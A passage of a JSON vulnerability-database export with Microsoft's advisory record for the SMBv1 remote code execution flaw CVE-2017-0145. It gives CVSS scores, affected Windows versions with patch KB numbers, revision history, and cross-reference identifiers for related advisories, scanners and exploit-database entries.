"Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}, "_object_type": "robots.models.mscve.MsCveBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.mscve.MsCveBulletin"]}, {"id": "MS:CVE-2017-0145", "hash": "91abc99a545f1702db030dbb906d98de", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-06T10:49:13", "history": [{"bulletin": {"id": "MS:CVE-2017-0145", "hash": "610b06c00c6979a0489de84ab5d2f19794bd75b251d9ff2bd6dd034946cfaa80", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft\nServer Message Block 1.0 (SMBv1) server handles certain requests. An attacker\nwho successfully exploited the vulnerability could gain the ability to execute\ncode on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker\ncould send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1\nhandles these specially crafted requests.\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2019-08-12T00:31:47", "history": [], "viewCount": 37, "enchantments": {"dependencies": {"modified": "2019-08-12T00:31:47", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2019-08-12T00:31:47", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "kbList": ["KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4012606", "KB4012216", "KB3205409", "KB3210720", "KB3205401", "KB4014077", "KB4012598", "KB4013198", "KB3177186", "KB3212646", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2 (Server Core installation)"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for x64-based systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016 (Server Core installation)"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for x64-based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for 32-bit Systems"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista x64 Edition Service Pack 2"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for x64-based Systems"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for 32-bit systems"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for 32-bit Systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012 (Server Core installation)"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for x64-based Systems"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012"}, {"kb": "KB4012216", "kbSupersedence": "KB4014077", "msplatform": "", "name": "Windows RT 8.1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for 32-bit Systems Service Pack 1"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for 32-bit Systems"}], "vendorCvss": {}}, "lastseen": "2019-08-12T00:31:47", "differentElements": ["description"], "edition": 1}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "0dea3a83027b5e4e9ecf6f325a34f59a", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-08-07T11:45:28", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2020-08-07T11:45:28", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2020-08-07T11:45:28", "rev": 2}}, "objectVersion": "1.4", "kbList": ["KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4012606", "KB4012216", "KB3205409", "KB3210720", "KB3205401", "KB4014077", "KB4012598", "KB4013198", "KB3177186", "KB3212646", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2 (Server Core installation)"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for x64-based systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016 (Server Core installation)"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for x64-based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for 32-bit Systems"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista x64 Edition Service Pack 2"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for x64-based Systems"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for 32-bit systems"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for 32-bit Systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012 (Server Core installation)"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for x64-based Systems"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012"}, {"kb": "KB4012216", "kbSupersedence": "KB4014077", "msplatform": "", "name": "Windows RT 8.1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for 32-bit Systems Service Pack 1"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for 32-bit Systems"}], "vendorCvss": {}}, "lastseen": "2020-08-07T11:45:28", "differentElements": ["href", "kbList", "msAffectedSoftware"], "edition": 2}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "1b472ec5c59922cde812024562ec895a", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-03-18T19:17:49", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-03-18T19:17:49", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-03-18T19:17:49", "rev": 2}}, "objectVersion": "1.5", "kbList": ["KB4013198", "KB3205401", "KB3177186", "KB3212646", "KB4012214", "KB4012598", "KB3205409", "KBMS16-110, 3187754", "KB4014077", "KB3210720", "KB3213986", "KB3210721", "KB4013429", "KB4012215", "KB4012216", "KB4012606", "KB4012217", "KB4012212", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for 